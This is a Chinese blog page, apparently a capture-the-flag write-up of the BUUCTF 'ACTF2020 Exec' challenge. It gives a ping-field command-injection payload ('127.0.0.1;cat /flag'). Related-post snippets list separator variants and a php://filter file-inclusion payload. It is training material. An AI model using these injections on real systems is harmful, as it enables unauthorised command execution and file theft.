buuctf [ACTF2020 新生赛]Exec

最新推荐文章于 2025-03-16 14:58:03 发布
最新推荐文章于 2025-03-16 14:58:03 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/SopRomeo/article/details/104563683
版权
由于提供的内容仅为'playload:',信息过少,无法提炼出关键信息形成摘要。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述
playload:

127.0.0.1;cat /flag

在这里插入图片描述

buuctf [ACTF2020 新生]Exec 1
hintll的博客
06-14 4953
[ACTF2020 新生]Exec 1 打开以后是 有个输入窗口有个ping 可能是sql注入,也有可能是命令执行漏洞 先ping一下本机地址:127.0.0.1 有回显: PING 127.0.0.1 (127.0.0.1): 56 data bytes 那就基本确定是命令执行漏洞: 命令执行有一个参考: https://blog.youkuaiyun.com/hintll/article/details/117790643?spm=1001.2014.3001.5501 直接上手: 先看一下目录: 127.0.0
[ACTF2020 新生] Exec
Sweet_vinegar520的博客
10-28 740
本题可以直接去翻找文件目录,毕竟包含 flag 的文件不一定每次都直接叫做 flag。此处其实。
BUUCTF-[ACTF2020 新生]Exec1
Monica的博客
09-11 4335
目录 题目: 分析: 知识点: 方法: 方法1:;前面和后面命令都要执行,无论前面真假 方法2:|(就是按位或),直接执行|后面的语句 方法3:||如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 方法4:&前面和后面命令都要执行,无论前面真假 方法5:&&如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令 注意: 题目: 分析: 通过...
[ACTF2020 新生]Exec1
最新发布
m0_73982061的博客
03-16 254
发现当使用ping 127.0.0.1;ls(或ping 127.0.0.1 & ls)可以尝试ping通本地ip即127.0.0.1,有回显,显然为命令执行漏洞。即ping 127.0.0.1;因此我们可以通过cd方法查看上一级目录方法查找flag。可以成功,显然为linux系统,且;找到flag文件后,我们可以通过cat命令来读取。
Buuctf-Web-[ACTF2020 新生]Exec 题解&思路总结
m0_62239233的博客
04-22 1084
常见的web漏洞——命令注入
BUUCTF————[ACTF2020 新生]Exec
qq_61579604的博客
11-02 226
只有一个index.php文件那么查看上级目录文件127.0.0.1|ls /使用命令127.0.0.1|ls查看此文件的目录。
BUUCTF:[ACTF2020 新生]Exec
末初 - mochu7
10-20 381
题目地址:https://buuoj.cn/challenges#[ACTF2020%20%E6%96%B0%E7%94%9F%E8%B5%9B]Exec 命令执行,使用;或者|进行注入 在根目录发现flag,直接读取
BUUCTF[ACTF2020 新生]Exec
m0_47745762的博客
07-20 445
一、题目内容 对Linux命令的运用 二、解题步骤 ①从根目录查找flag (1)进入到靶机中 (2)用本机地址随便ping一下,看看能得到那些信息 (3)然后通过ls命令查找当前目录中有哪些文件 (4)查找后发现只有一个index.php的文件,我们查找一下里面是否含有flag的信息 (5)分析PHP代码,发现只有一个isset函数用于判断post传过来的数据是否被提交过来 (6) 我们发现当前目录中并没有关于flag的相关信息,那就可能是在根目录上,我们就挨个返..
buuctf ACTF2020upload
12-31
对于`ACTF2020 新生`中的`Upload`题目,在成功上传文件后返回路径 `./uplo4d/ddea6db74c0ab39b95ce495a41dfb1bf.phtml` 表明服务器端存在PHP处理逻辑,并且允许访问该位置下的`.phtml`文件[^2]。这暗示着可能存在...
Buuctf Web题解
weixin_68029979的博客
04-24 1940
写在前面, 本人小白一枚,记录一下web做题过程,大部分为个人理解可能有些地方写的不够明确还请见谅。当然由于刚入手web题,所以有些题会没有思路,这时会参考其他大佬的题解过程。本文会一直更新,由于是第一次写博客,所以并不知道一篇能写多少,不管怎样会一直更新的。在题解中,可能并没有说清除为什么是这样,什么要这样,其实大部分我也不知道是为什么,但就是这样做,由上所说我是个小白。如果在文中,出现了只有题目没有题解的情况,是因为我还没有学习与之相关的知识,所以先跳过了,但总会写的。
BUUCTF】[ACTF2020 新生]Exec Writeup
algae
08-23 1455
|cat /flag 标记{f40182a0-6749-43f2-b223-9651bf2ef2d0}
BUUCTF 之 [ACTF2020 新生]Exec(命令执行漏洞)
两个月亮
01-08 1370
这界面和这网页标题结合起来,相信给位都能猜到这个靶场中很有可能存在命令执行漏洞。文件往往位于根目录下,但也不要被反套路了。可以看到并没有我们期望的文件。这些文件夹都不需要管它,在。
buuctf web题[ACTF2020 新生]Exec
qq_44740774的博客
09-25 314
buuctf web的[ACTF2020 新生]Exec
BUUCTF刷题记录】[ACTF2020新生]Exec
m0_60911102的博客
09-01 1418
BUUCTF刷题之命令执行---exec
buuctf-web入门-[ACTF2020 新生]Exec 1
2301_80137226的博客
03-24 556
我们首先尝试一下ping本机127.0.0.1(本地回环地址)然后我们尝试看一下flag下是否还有目录。然后再遍历目录,查找我们需要的flag。当../../../时发现flag。我们尝试127.0.0.1;在此之前先了解一下常用的命令。可以看到没有过滤分号和ls。大致判断这道题没有过滤。我们再尝试打开flag。一道简单的命令注入题。
BUUCTF [ACTF2020 新生]Exec
m0_49025459的博客
04-18 1930
题目 输入127.0.0.1|ls /看根目录 | 输入127.0.0.1|cat /flag看flag 这道题就是利用管道符来做 可以直接在ping输入框中输入1;cat /fag;也可以 1|cat /flag 1&cat /flag 当然如果使用 ||必须需要前面是一个假的,就是前面条件为假才执行后面的否则只执行前面的 所以可以用 a||cat /flag 以上方法都可以得到结果 1、|(就是按位或),直接执行|后面的语句 2、||(就是逻辑或).
buuctf [ACTF2020 新生]Include 1
02-26
### BUUCTF ACTF2020 新生 Include 1 解题报告 #### 题目背景与目标 BUUCTF中的ACTF2020新生题目Include 1涉及到了PHP文件包含漏洞的利用。通过分析给定的信息,可以推测出该题目旨在考察参者对于PHP文件包含漏洞的理解以及如何有效利用此类漏洞获取敏感信息。 #### 文件包含漏洞概述 PHP文件包含漏洞是指攻击者可以通过控制输入参数来指定要加载的文件路径,从而实现远程文件读取或执行恶意代码的目的。这种类型的漏洞通常发生在开发者未对用户提交的数据进行严格过滤的情况下[^1]。 #### 利用过程解析 针对这道题目,主要关注点在于`include()`函数的行为及其潜在的安全风险: - **本地文件包含(LFI)**:如果程序允许用户自定义文件名并直接将其作为参数传递给`include()`,那么就可能存在LFI的风险。 - **远程文件包含(RFI)**:当服务器配置不当(如allow_url_include设置为On),则可能允许外部URL被当作合法资源引入,进而造成更严重的后果。 为了成功解决这个问题,选手需要找到一种方法绕过任何现有的防护措施,并最终访问到含有flag信息的目标文件。考虑到实际环境中的防御机制,这里的关键可能是寻找合适的payload组合以突破限制条件。 #### 实际操作建议 基于上述理论基础,在具体实施过程中可尝试如下策略: 1. 测试不同形式的文件路径(绝对/相对),观察响应差异; 2. 尝试使用伪协议(`php://filter`)转换数据流,改变文件内容呈现方式; 3. 结合其他已知技巧(如目录遍历字符%00截断等)进一步探索可能性。 值得注意的是,虽然题目描述中并未提及具体的防护手段,但在真实场景下往往还会遇到诸如黑名单过滤、白名单验证之类的障碍。因此,灵活运用各种技术细节将是解决问题的关键所在。 ```php // 示例 Payload (仅作学习交流用途) http://example.com/vuln.php?page=php://filter/read=convert.base64-encode/resource=config.inc.php ``` #### 总结 通过对BUUCTF ACTF2020新生题目Include 1的研究可以看出,掌握常见Web安全漏洞的工作原理及其对应的缓解方案是非常重要的。同时也要注意遵循道德准则,在合法授权范围内开展渗透测试活动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值